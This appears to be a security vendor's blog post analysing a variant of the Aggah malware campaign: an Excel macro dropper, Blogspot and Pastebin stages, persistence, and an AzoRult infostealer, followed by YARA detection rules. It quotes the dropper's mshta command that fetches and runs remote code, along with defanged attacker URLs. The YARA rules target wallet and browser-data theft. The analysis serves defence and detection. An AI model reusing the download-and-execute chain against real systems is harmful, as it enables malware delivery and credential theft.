During our threat monitoring activities, we discovered an interesting drop chain related to the well-known Aggah campaign, the ambiguous infection chain observed by Unit42 which seemed to deliver payloads potentially associated with the Gorgon Group APT. After that, we discovered other malicious activities using the same TTPs and infrastructures, for instance in “The Enigmatic “Roma225” Campaign” and “The Evolution of Aggah: From Roma225 to the RG Campaign” reports. 

But, despite the very similar infection chain, this latest attacks revealed a curious variation of the final payload, opening up to different interpretations and hypothesis about the “Aggah” activities.

Technical Analysis

Hash7f649548b24721e1a0cff2dafb7269741ff18b94274ac827ba86e6a696e9de87
ThreatExcel document Dropper
Brief DescriptionFirst stage of Aggah campaign
Ssdeep768:4Sk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJrqYtAd/fBuzPRtUb:hk3hOdsylKlgxopeiBNhZFGzE+cL2kd3

Table 1. Sample’s information

As in most infections, the multi-stage chain starts with a weaponized Office document containing VBA macro code. It immediately appears obfuscated and after a de-obfuscation phase, we discovered it invokes the following OS command:

mshta.exe http://bit[.ly/8hsshjahassahsh

The bit.ly link redirects on the attacker’s page hosted on Blogspot at hxxps://myownteammana.blogspot[.com/p/otuego4thday.html. This is the typical Aggah modus operandi. In fact, the webpage source code contains a JavaScript snippet designed to be executed by the MSHTA engine.

Figure 1. HTA script hidden into Blogspot page

Figure 2. Deobfuscated HTA script

This script is obfuscated using a combination of URL-encoding and string reversing. Once again, the script is only a dropper that downloads the next malicious stage hosted on PasteBin. Like the previous Aggah campaigns, the pastes were created by the “hagga” account. This stage is designed to kill the Office suite processes and to create a new registry key to achieve persistence on the target system. This way the hagga dropper would survive the reboot.

Figure 3. Another obfuscated Javascript snippet

In detail, the malware uses three mechanisms to ensure its persistence on the victim machine:

Each entry contact pastebin.com to download and execute further payload. The interesting fact is that the URL referred by tasks and regkey are different from each other, so the attacker is able to deliver more than a payload by just changing one of the pastes.

Figure 4. Code used to set persistence

During the analysis, all the three URL pointed to the same script, which is reported in the following screen. The cleaned code reveals a byte array composing Powershell commands. It downloads two other snippets from Pastebin. 

Figure 5. Deobfuscation process

Figure 6. Powershell script used to inject the final payload in legit process

The first one corresponds to the “Hackitup” DLL file, previously discussed in our previous report. The second paste is the final payload. In many other Aggah campaigns it corresponds to RevengeRAT, which could also be linked to the Gorgon Group. However, during the analysis we identified another kind of final stage. 

The AzoRult Payload

Hash37086a162bebaecba466b3706acea19578d99afd2adf1492a074536aa7c742c1
ThreatAzoRult 
Brief DescriptionAzoRult final payload
Ssdeep3072:tuOSXpMx7ZAlHsbfUkolNGti7lfqeSxM3SpyEY3E/qxg/:Zzx7ZApszolIo7lf/ipT/q

Table 3. Sample’s information

This time, the final payload was a variant of a popular infostealer for sale on the dark markets, AzoRult. It is able to access to saved credentials of the major browser like Chromium, Firefox, Opera, Vivaldi to exfiltrate cookies, credentials and other navigation data.

Figure 7. AzoRult tries to extract info from browsers files

Having a deeper look to the command and control infrastructure we noticed some interesting details. In fact, we discovered the particular, customized, AzoRult 3.2 fork called “Mana Tools”. At the same time, reviewing the infection chain data revealed the presence of a reference to this “Mana” customization even in the blogspot page abused in the first steps of the chain. 

Figure 8. Blogspot page (on the left); “Mana” logo related to AzoRult C2

Conclusion

We have monitored the campaign and its final payload for different days finding the attacker delivered AzoRult samples only a few times, during the first days of September 2019, and after that it resumed to deliver RevengeRAT samples.

The “Mana” campaign opens to a series of hypothesis about the threat actor behind it. According to Palo Alto Networks, the “Aggah” infection chain could have been used by GorgonGroup too, but with a different payload. So, it is possible that Gorgon added this particular AzoRult version to their arsenal, maybe to retrieve initial information about its initial victims or to increase their recon capabilities. But the confidence in this scenario is not high enough to confirm it. Another possibility is that another minor cyber criminal leveraged the Aggah infection chain to deliver his AzoRult payload, which is a commodity malware, or also the actors behind the “Hagga” Pastebin account used their own infection chain to conduct its own attack campaign. Many question only further hunting could answer.

Indicator of Compromise

Yara Rules

import "pe"
rule Mana_Aggah_campaign_excel_dropper_Sep_2019{

    meta:
      description = "Yara Rule for Mana campaign Excel dropper"
      author = "Cybaze Zlab_Yoroi"
      last_updated = "2019-09-18"
      tlp = "white"
      category = "informational"

    strings:
   		 $a1 = {64 68 61 73 6A 00 6B 68 64 61 6B 6A 73 68 00 64 6B 61 28 29}
   		 $a2 = {61 70 74 77 4D 71 55 45 27}

    condition:
   	 all of them
}


rule Mana_Aggah_campaign_injector_Sep_2019{

    meta:
      description = "Yara Rule for Mana campaign DLL injector"
      author = "Cybaze Zlab_Yoroi"
      last_updated = "2019-09-18"
      tlp = "white"
      category = "informational"

    strings:
   		 $a1 = {4D 5A}
   		 $a2 = {93 E5 21 3F 59 AE}
   		 $a3 = {11 08 28 22}
   		 $a4 = "v2.0.507"
   		 $a5 = {E2 80 8C E2 80}
   		 $a6 = {81 AC E2 81 AF E2 80 AE}
   		 $a7 = {E2 81 AA E2 80}
   		 $a8 = {81 AF E2 80 AA}
   		 $a9 = {81 AC E2 81 AF E2 80 AE}
   		 $a10 = {C5 C7 4C 9E 65 A5 B6 42}

    condition:
   	 6 of ($a*)
}

rule Mana_Aggah_campaign_AzoRult_Sep_2019{

    meta:
      description = "Yara Rule for Mana campaign AzoRult sample"
      author = "Cybaze Zlab_Yoroi"
      last_updated = "2019-09-18"
      tlp = "white"
      category = "informational"

    strings:
		$h1 = {4D 5A 50}
		$bob1 = {55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8}
		$bob2 = {55 8B EC 83 C4 F0 53 56 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8}
		$bob3 = {55 8B EC 83 C4 F0 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 ?? ?? ?? ?? E8}
		$s1 = "SOFTWARE\\Borland\\Delphi\\RTL" ascii wide
		$s2 = "moz_historyvisits.visit_date" ascii wide
		$s3 = "\\BitcoinCore_custom\\wallet.dat" ascii wide
	condition:
		$h1 and all of ($s*) and 1 of ($bob*)
}

This blog post was authored by Antonio Farina and Luca Mella of Cybaze-Yoroi Z-LAB